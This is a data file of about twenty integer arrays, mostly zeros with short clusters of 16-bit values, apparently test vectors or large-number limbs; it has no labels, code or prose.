[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 22916, 49217, 36838, 19718, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 52224, 37632, 7360, 20784, 30156, 54675, 63408],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 49284, 55105, 64742, 51718, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 56320, 55040, 64960, 3440, 27100, 42995],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 10116, 60993, 27110, 18182, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 58368, 6400, 11840, 27024, 12004, 38937, 54322],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 36484, 1345, 55014, 50182, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 26624, 23040, 42624, 54688, 45672, 19546, 41757],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 62852, 7233, 17382, 16646, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 15360, 61184, 5056, 55024, 58684, 2031, 19748],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 23684, 13121, 45286, 48646, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 26624, 55808, 59008, 60832, 23144, 28535],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 50052, 19009, 7654, 15110, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 54272, 38144, 11584, 12624, 65236, 3733, 39686],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 10884, 24897, 35558, 47110, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 6144, 34304, 20864, 43104, 40216, 7046, 53121],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 37252, 30785, 63462, 13574, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 44032, 35584, 56000, 20656, 12716, 43403, 21080],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 63620, 36673, 25830, 45574, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 13312, 60672, 54080, 11984, 47924, 4539],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 24452, 42561, 53734, 12038, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 50176, 20736, 31808, 19728, 964, 19025, 33690],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 50820, 48449, 16102, 44038, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 51200, 61952, 35968, 24352, 8392, 59634, 45221],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 11652, 54337, 44006, 10502, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 7168, 26368, 29120, 32368, 19228, 13927, 56140],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 38020, 60225, 6374, 42502, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 33024, 47168, 62143],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 64388, 577, 34278, 8966, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 46080, 19712, 6976, 31952, 44468, 59213, 49646],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 25220, 6465, 62182, 40966, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 30720, 40448, 22400, 47584, 28024, 32926, 35465],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 51588, 12353, 24550, 7430, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 35840, 33536, 55488, 8240, 8588, 27267, 31744],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 12420, 18241, 52454, 39430, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 35840, 17152, 47296, 37936, 48524, 13955],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 38788, 24129, 14822, 5894, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 41984, 35072, 2624, 32912, 27812, 49545, 18946],
